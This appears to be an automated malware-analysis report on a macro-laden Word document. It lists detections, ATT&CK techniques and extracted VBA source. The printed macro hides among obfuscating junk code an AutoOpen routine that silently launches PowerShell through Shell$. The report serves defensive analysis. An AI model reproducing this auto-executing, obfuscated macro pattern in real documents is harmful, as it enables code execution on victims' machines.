MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros with critical firings for Shell() calls and PowerShell references. The 'autoopen' macro suggests it executes automatically upon opening. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further indicates a macro-based threat that likely uses shell commands. The primary function appears to be executing PowerShell, suggesting it acts as a downloader for further malicious activity.
Heuristics 9
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0 End Function -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0 End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() MfKEFtN -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7935 bytes |
SHA-256: 06b0086f2a0b6650692f73efddfbaddf06183d69cf30ed48eb7fa455235165ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub MRfF227()
On Error Resume Next
Do
Select Case pKQixBx
Case 18793868
HrCrIlf = CBool(65 - CSng(vuAl - Round(558) - beAC / CLng(11 * Rnd(171417130))))
yJEO967Y6 = 9203
Case 5
bHmbEY = Int(532772391)
kIUWfo8K = Int(tYFk813D3)
End Select
Dim seH()
ReDim seH(2)
seH(0) = 264849359
seH(1) = 33098296
Select Case CZk
Case 346281819
ZIj = Hex(43848039 - ChrW(dbS) / 7 * ZveT8T2H9)
CreK9UY6 = Sqr(kORo485V8 + CByte(365104055 + Round(9041 / Log(8) / TKl - ChrW(51))) / KBoC6f220 + JSvX78At)
kHgLw2 = Int(9434)
Case 6
kLF = Fix(vaKp7)
LwzTji = CBool(eiug7)
zvbH5M = jUNFrPs
Case 2986
YMRS = 29
eXG = Round(232952633)
OgyR13aJ = Hex(1)
End Select
Set aGj = MeMG01
Loop Until TMGC15d <> ptHmBrqQE
Do
oMQY = Sin(406004041 - Chr(fbIQV / CByte(7 / hyGB) - 3 * Round(5 * BteDKgp)) - nRQrs3S + CDate(467260834 + ChrB(bUHdH)))
qPxG = fbeZx1C + 536281499
hNlToXE0 = (3276 / CStr(enjV87yY - Rnd(9)) * 52 / CInt(985 + Hex(1 * 21) / 5 * CInt(hDQS - CByte(598))) * Iblb0 - Chr(CcX))
Do
BSCB5965 = CDbl(96)
Loop Until KAjc8 <= DOc
KIlFg1 = (yuTRu0wQ6 / PlGJ5x6T - (560 - ChrB(teIy) - NRSdnP + CByte(4680) / (Rqm * Tan(90) * (9669 + CLng(JDmPeCwhZ - Int(jWvF2)) - RNgDS4h5y * 3))))
Loop Until yQIY8htto Or 5
rjoG1P = MmD - oHh
End Sub
Sub VXnWm(JRmm4h)
On Error Resume Next
If hfuM8 Or tHTPP Then
Do
vswXP9rWb = gbej4mY7n + Int(8105) / jkLO * Hex(KKG / Atn(9)) / RhT - Fix(670)
Loop Until lmHoU0o Or RVqCq4Do7
If nLFz Eqv hkUu201R Then
LTl = CBool(250089612)
End If
ElseIf YQPf Xor EbhQ62 Then
Do While GrhR And qjnU6q
ygJXK = 512374437
Loop
Vyo = (IaG + CDate(8 / RwVB26 - jttkjmQ / Sqr(onOb9Gx)) + KBvgz - ChrB(71) - cgtv45 + 96 + JYmphtI69 / sIm + 5 - Oct(bJhbnw0c / CStr(TWTb7B) * 70 - CDate(IlBx)) * 30 * Oct(eOjzJ54ai))
End If
Select Case XZZT9z
Case 918
KfOAFH6Iu = CDbl(284685011)
GBALw9E10 = CLng(305749864)
zhqEWH = Hex(3424 - ajwHo0T1)
Case 9
taOh = ZBluh
bXIl9a = QrMCX589Y
xPCU66c = CByte(6408)
End Select
End Sub
Sub autoopen()
MfKEFtN
End Sub
Sub fduN(OJff)
On Error Resume Next
Do While FLYI7G263 >= 18
qBvlX = MdKK - 21976223
Iavn3u07a = KbVR49F * 189328296
Loop
While oXQibRnr Xor kBlOH01b
Do While EMju8w <> EfNF7
KUa = Atn(80 / Tan(23 - DqU) - CrEK4 - 8951)
Loop
VxlOb167 = tvst2V94 / CLng(4 * ChrB(adNb)) + 448636581 - Tan(94 + Cos(245842808)) / 356 - Round(xSz) / yWxu52I + CDbl(GBFV4aDL) - 1229 * Sin(425 + Log(304096732)) / (JxnL2 / CDbl(1 + Round(3) / hxTR * Tan(61 + CLng(IvOq016W0 + Atn(cAZ)) * 242025946 - Atn(JCdi337))))
hFNAAo9 = ChrW(cyp + CStr(AwfpV) - kTkBp86 / 6)
Do
VGBC = KxJJnEgZ4 - Rnd(sozb - Oct(HZMd5m2e * CLng(432728309 * CLng(VoNx16))) - Wszwp * 658) * 870 / 193690625 * fXAip91 + Fix(fltHA11H + 701)
Loop Until ePZsCbwig <> 19
While Fsp Or 732
VXQK0 = 92 + Cos(yoEnGnPp / Round(bSr / CStr(VIoP3r2) / 97582935 * LGNO9H) + 533087076 - Chr(ysid7)) * (1 / 890 / 15323515 * CByte(OXqd5) * 186 + 608 + IquI637K / 13 / (9 + mfmt8e7))
Wend
While tjoo6 >= feJk024u
QRuNK9z = (3033 - CDate(322) / 149 / DAOqsNP99) + (UzzoAV8 / Atn(63) - (bGWa2s4T - CDate(5)))
Wend
Wend
ySA = CBool(8)
End Sub
Sub OJcf71T61()
On Error Resume Next
Do While QZciS And 7
For Each skqku3N In UQN
udcBgS = mHuP9FPN8 - CLng(iCip) / QCBd + CDbl(71816958) + 8470 + CLng(UmmI1 - vfjNiv3) - jyJi4 + Log(HeqUMrT4W) + IjsS + Atn(dxRX0g15)
Next
rPXf1I4 = CrlE
BHlI544g8 = RSeD
mgokdB2 = 486058022 * 295585723
Loop
If owYKsh4eZ < UwvHyr Then
While jxYMb70L And XhNmm14x
ltQp = OhcL7Y1D4 - Sin(NKYaXhjJ * Rnd(4) / eoDSNj09 - Hex(fnVH)) + (152736399 + CDbl(8601))
Wend
CPdr5V8M = cBUx0BBw4 + GAYw02J
ElseIf EUha Xor NhTm3C Then
Set rJIa = AnmH3J646
For Each vmjYlP0 In PMSU1
tJiXR = (68 - ChrB(514168117 + Sgn(609 + Int(538 * ChrW(368339161 * CStr(LUzBF2I1B))) * 639 * 528157508) - mUCMF63Y * Round(688)) + (6 - CBool(7260 / Int(378) + dzbB4M / slXZ1) - rxdi - Round(5) / (zmXu + 65)))
Next
End If
End Sub
Public Function MfKEFtN()
On Error Resume Next
VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0
End Function
Sub YqkwQw2()
On Error Resume Next
Do
Do
zvBF82iy = DZHBB - 70 * YEAv + Sgn(WBGU2E11)
Loop Until uhFb < uNtR965
While nJtGlp3 >= jTklnfsL
LNaVi2 = 521 / sfWck / pceZh415 / ChrW(595 / CInt(2)) - 5 * Round(XZBQf7) - 6800 - CLng(gOjj9b062 + BmKi303D) * 60 / Int(MNQM7744) + (8059 / Tan(XzUIzK6x) / YihiPs6 * CDbl(20776914 * CDate(514113094) + 1 / Round(270060603)))
Wend
veIfF = 815 * Round(iCZNo) + QXTX / 112188161 / (THVDarIU * Sin(GZT))
For Each POPxv4S2 In wOGJ7lj
AHGz = PlXC * Round(455799610) - 2905 / gSDy + (bsxt178U / Round(zQad - mXBXV8) / 89442276 - 657 / (204367578 / CInt(viTv5 * 304) - ViVY4P50 - Fix(313922968)))
Next
rwbd = 240248942 / jcHn5
Loop Until iEmV69 <> iFUQg78
DlNc5422 = (27 - ydEY - RMq / CBool(CMKu4) - (aeKY28n9 / CByte(rRI) + (RcqRp - CBool(LfRI08C8z - ChrB(223481334) * JHK / Sgn(25 - CLng(69))) + (vtuB2oY + ChrW(2935 + CInt(9) + UzjQ * CInt(181911309)) * 665 / Rnd(7)))))
While KWhY1 >= 21
For pCIET = ElOk0BC64 To xEjX07Q
wAGR9 = Cpvr042V / Cos(MqvS7A29 / fpQqDXHF3 - 81 / Atn(1)) / lgbyr3U - Rnd(7) * WFpZx5 * Log(1596 * fqRB)
Next
If PupH01uC <= 14 Then
IGgxO = 807
End If
For BIT = 2418 To 7677
dlkJc7 = zgn * Hex(7745) - 301618901 + Hex(vOfoT5uu) / oOHQ * Oct(89 - Atn(RVuOj1 - Fix(72))) - 68 / Log(SfZnP6) * (kQlG / CStr(4375) / (FUa / CDbl(iwVC) + EebH1l1l2 / Chr(2)))
Next
Wend
End Sub
Sub hwrOJ4(Byv)
On Error Resume Next
If EfvU0ypm >= ceWj6u7 Then
If vtmo > 17 Then
ayk = CSng(kru)
End If
Select Case wjcxxjA
Case 6919
MlVN72x = 326
Ekix12Yh1 = CSng(8)
WbR = Sqr(dufvSoDR)
Case 3
UgBS37 = eaji
xHJiODDFe = CLng(WKK)
hfLIkqA = CByte(15)
End Select
End If
If XLzX0B8 = UvrR60 Then
Select Case ijHdO
Case 867
OhhU9nF = KWbSS1
iaAoX6 = CStr(4)
EtW = Fix(5101 / Round(wnjuo6))
Case 153
eUkB = 1665
VuMG847 = Cos(438249070 + 6)
yWwz5 = Hex(MDiS5K)
Case 40
yOAWD5pS = HCzzWSso
Wio = Sqr(330)
uwC = 3
End Select
While pPt < 6186
XMuq0 = DQz / Round(PzZb6) - PkLI468jd + PjMK5 / 154 / Hex(ucUOAwz0w) - nWW / Fix(TMuj3) / OrpX2 * Sgn(moU) * (ABxD - Atn(4899) - 136094830 * Log(cFLK86e01))
Wend
ElseIf IAV <= 66679749 Then
For Each Qrcxt9Li3 In POgy2N7G
lBeh = 9006 - Fix(brMn9v800) + 45 + Log(QkVr) * sNET41v + CBool(pFfH)
Next
While mPBXlK465 Xor 26
uCDq = jOYl / sUBFo05 - hNZ + Chr(93) - 420140798 - CLng(fVWISB)
Wend
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.